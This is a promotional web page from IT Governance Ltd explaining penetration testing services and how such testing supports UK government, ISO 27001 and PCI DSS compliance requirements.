It’s not a question of if you will be attacked, but when.
What is penetration testing?
Effective penetration testing involves simulating a malicious attack on an organisation’s information security arrangements (either from malicious outsiders or its own staff), often using a combination of methods and tools.
The aim is to identify known vulnerabilities such as browser exploits, unpatched software, unsecure coding practices and weak encryption algorithms. A penetration test must be conducted by a certified ethical penetration tester, who will use their expertise to identify specific weaknesses within an organisation’s security arrangements.
Why conduct penetration testing?
Penetration tests are an important part of the process of identifying, measuring and communicating your cyber risks so that smart risk mitigation can be implemented. With the results of a successful pen test, you can show that the investments you are making have actual benefits that will support your organisation’s overall business objectives.
Threats are constantly evolving and changing:
More and more applications are directing traffic by default through http to bypass firewall rules.
Malware can be downloaded automatically.
Websites can be infected by code injection, cross-site scripting and other similar black-hat hacking techniques.
Your website traffic can be hijacked.
Blacklisting by major search engines can cause you to lose business.
As you can see from the examples above, it is easy for new vulnerabilities to be identified and exploited by criminal hackers. In many cases, you won’t even know that your defences have been successfully breached until it’s too late. Even if you are a relatively unknown organisation of little apparent interest to an attacker, the criminals’ automated scans will find your presence online.
Which test best suits my organisation?
Here at IT Governance, we present the vulnerabilities and risks to the organisation once the test has been conducted, along with recommendations for solutions, which are displayed as hard facts in a simple report designed to be easy to understand.
Our bespoke penetration tests deliver cost-effective and practical solutions that will help you meet every legal, regulatory and contractual requirement:
Regular vulnerability scanning and penetration testing should be a fundamental part of your monthly and quarterly security review process. These tests ensure that you identify and fix vulnerabilities and security holes as quickly as possible, and establish whether your cyber controls are working as effectively as they need to.
Read more about penetration testing as a government requirement, and how it applies to the PCI DSS and ISO 27001
Penetration testing as a government requirement
Under the government’s Security Policy Framework, all ICT systems that handle, store and process protectively marked information or business critical data must undergo a formal risk assessment to identify and understand relevant technical risks. They must also undergo a proportionate accreditation process to ensure that the risks to the confidentiality, integrity and availability of the data, system and/or service are properly managed. Penetration tests will be required in line with the mandatory technical risk assessments for all ICT systems or services. These assessments must be repeated annually or whenever there are significant changes to a risk component.
Public sector organisations must also ensure that their suppliers' security arrangements are appropriate for managing risks and responding effectively to any incidents. To comply with this requirement, public sector organisations must seek assurance from their suppliers that protective security and information risks are being managed to an appropriate level. In addition, the management of assurance activities must be independent of the organisation providing the service. The UK Government considers ISO 27001 to be best practice in managing information security risks, and in some instances ISO 27001 certification is a requirement of doing business with the government.
Penetration testing and ISO 27001
Penetration testing is an essential component of any ISO 27001-compliant information security management system (ISMS), from initial development to ongoing maintenance and continual improvement.
Control A.12.6.1 of ISO 27001:2013 specifies that “Information about technical vulnerabilities of information systems being used shall be obtained in a timely fashion, the organization's exposure to such vulnerabilities evaluated and appropriate measures be taken to address the associated risk.” A vulnerability assessment or penetration test is the best method for identifying these vulnerabilities in systems, infrastructure and web applications.
There are three specific points in your ISMS project at which penetration testing can make a significant contribution:
As part of the risk assessment process: uncovering vulnerabilities in any Internet-facing IP addresses, web applications, or internal devices and applications, and linking them to identifiable threats.
As part of the risk treatment plan: ensuring that controls actually work as designed.
As part of the continual improvement process: ensuring that controls continue to work as required, and that new and emerging threats and vulnerabilities are identified and dealt with.
Penetration testing and the PCI DSS
Requirement 11 of the PCI DSS covers the need to regularly and frequently carry out tests to identify unaddressed security issues and scan for rogue wireless networks. The Standard states that penetration testing should be performed at least annually, as well as whenever there is a significant infrastructure or application upgrade or modification (for example, new system component installations, or the addition of a sub-network or web server).
Why use IT Governance?
IT Governance Ltd
is a CREST member company
. This means that we have been verified as meeting the rigorous standards mandated by CREST. Clients can rest assured that IT Governance penetration tests will be carried out to the highest standards by qualified and knowledgeable individuals.
Book your test online, contact us direct by telephone +44 (0)845 070 1750 or email us.